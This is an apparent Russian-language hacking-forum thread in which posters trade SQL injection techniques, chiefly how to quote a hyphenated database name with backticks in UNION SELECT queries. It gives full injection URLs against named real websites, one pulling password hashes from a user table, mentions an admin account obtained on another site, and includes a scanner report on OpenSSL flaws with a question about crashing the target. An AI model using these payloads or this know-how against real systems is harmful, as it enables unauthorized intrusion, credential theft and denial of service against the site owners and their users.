Слип, ты сначало сам попробуй где нить имя таблицы в хекс первести и потом данные извлечь, ога? Друк Кузьмича что ли?
Блядь ты знак "?" видишь или нет? Мб мне надо скрин своего поста для тебя сделать=\ Ты сам то походу не далеко ушёл=\
Наковырял инж на сайте http://www.ecoaction.com.au/, подобрал таблицы, поля, есть акк админа: Вопрос значит такой: а где админка?))).
вы синтаксиса sql походу вообще не знаете в запросе после from таблицу надо указывать без ковычек, так как она есть т е select * from omfg а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11) и уж самый пиздец вот это http://forum.antichat.ru/showpost.php?p=547344&postcount=632
если ты про Noiro, то он абсолютно все правильно сказал имена таблиц поидее должны обрамляться в апострофы (обратные кавычки) именно в таких случаях это критично остальные посты улыбнули
ога, только вот ошибочку то выдаёт Error: Incorrect table name 'pure-ftpd.users' Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
так надо обратныйе кавычки урл код которых %60 т.е. запрос будет: http://site.dmn/script.php?id=1 union select 1 from %60pure-ftpd%60.users/* и соответственно имя бд отдельно в обратные кавычки брать от .users
впишусь пожалуй в вашу тему, причем тут кавычки, если в посте с вопросом ясно написано, что мешает "-" в "pure-ftpd.users"? и еще, ссылку кидали на сайт, или мы вслепую помогаем?
2Ded MustD!e, да не стоит вписываться, все уже давно решено, я общался с Piflit`ом по осеку и все прокатило, объясняю как я сам это все понимаю, pure-ftpd здесь воспринимается как выражение а не название таблицы т.е. есть оператор минус, поэтому ошибка и выдается, если ты пишешь `pure-ftpd`.users , то одназначно указываешь мускулу, что pure-ftpd - это имя БД а не операция
Ну вот вам пример ) http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12,13+from+ita-forum.itaf_user/* при таком запросе будет ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3 А если так http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12,13+from+%60ita-forum%60.itaf_user/* мы увидим хеш Так что Scipio абсолютно прав
Хеллоу всем =D Вопрос такой: сканил один сайт и он нашел такую уязвимость Подозрение на серьезную уязвимость Множественные уязвимости (OpenSSL) Описание Краткое описание Уязвимости позволяют удаленному атакующему выполнить произвольный код в системе или вызвать отказ в обслуживании приложения. Подробное описание 1. Уязвимость существует из-за ошибки при обработке некорректных ASN.1 структур. Удаленный атакующий с помощью специального запроса может вызвать отказ в обслуживании приложения. Уязвимости подвержены все приложения использующие библиотеку OpenSSL для обработки ASN.1 данных. Выпуски OpenSSL до версии 0.9.7 не содержат данную уязвимость. 2. Обработка публичных ключей определенного типа требует большого количества процессорного времени. Злоумышленник с помощью серии специальных запросов может вызвать отказ в обслуживании приложения. 3. Уязвимость переполнения буфера в функции "SSL_get_shared_ciphers()". Злоумышленник может отослать уязвимому приложению SSL запрос содержащий специальным образом сформированный список шифров, при обработке которых функцией "SSL_get_shared_ciphers()" произойдет переполнение буфера. Данная уязвимость при определенных обстоятельствах может быть использована атакующим для выполнения произвольного кода в системе. 4. Уязвимость существует в клиентских процедурах отвечающих за обработку SSLv2. Данная уязвимость может быть использована только для проведения DoS-атак направленных на клиентские приложения использующие уязвимую библиотеку OpenSSL. Потенциально уязвимостям подвержены все приложения использующие уязвимую библиотеку OpenSSL. Уязвимые версии OpenSSL версии 0.9.7k и предыдущие OpenSSL версии 0.9.8c и предыдущие Использование уязвимости Использование уязвимости удаленно: да Использование уязвимости локально: да Базовая оценка по системе CVSS CVSS Base Score: 8 (AV:R/AC:L/Au:NR/C/I/A:C/B:N) Ложные срабатывания (False Positives) Вывод о наличии уязвимости сделан на основе версии по результатам идентификации сервисов и приложений на сканируемом узле. Если при установке обновления номер версии не менялся, возможно ложное обнаружение уязвимости. Пропуск уязвимости (False Negatives) Случаев пропуска уязвимости зарегистрировано не было. Причины возможных пропусков неизвестны. и еще Подозрение на уязвимость DoS-атака (OpenSSL) Описание Обнаружено несколько уязвимостей в OpenSSL. 1. Обнаружена уязвимость нулевого указателя в функции do_change_cipher_spec(). Удаленный атакующий может послать серверу специально сформированное SSL/TLS рукопожатие (handshake), что заставит OpenSSL аварийно завершить работу. 2. Уязвимость обнаружена в SSL/TLS handshakes при включенном Kerberos шифровании. Удаленный атакующий может аварийно завершить работу службы. 3. OpenSSL некорректно обрабатывает неизвестные типы сообщений. Удаленный атакующий может специальным образом вызвать отказ в обслуживании. Уязвимые версии: OpenSSL Project OpenSSL 0.9.6 k OpenSSL Project OpenSSL 0.9.6 j OpenSSL Project OpenSSL 0.9.6 i OpenSSL Project OpenSSL 0.9.6 h OpenSSL Project OpenSSL 0.9.6 g OpenSSL Project OpenSSL 0.9.6 f OpenSSL Project OpenSSL 0.9.6 e OpenSSL Project OpenSSL 0.9.6 d OpenSSL Project OpenSSL 0.9.6 c OpenSSL Project OpenSSL 0.9.7 c OpenSSL Project OpenSSL 0.9.7 beta3 OpenSSL Project OpenSSL 0.9.7 beta2 OpenSSL Project OpenSSL 0.9.7 beta1 OpenSSL Project OpenSSL 0.9.7 b OpenSSL Project OpenSSL 0.9.7 a OpenSSL Project OpenSSL 0.9.7 можно ли чем либо грохнуть попробывать? Посовтеуйте, что вы об этом думаете.
ну ты извращенец... не знаю что ты хочешь сделать но гг вообще то есть пара других способов начать комментарий... К примеру два тире подряд --
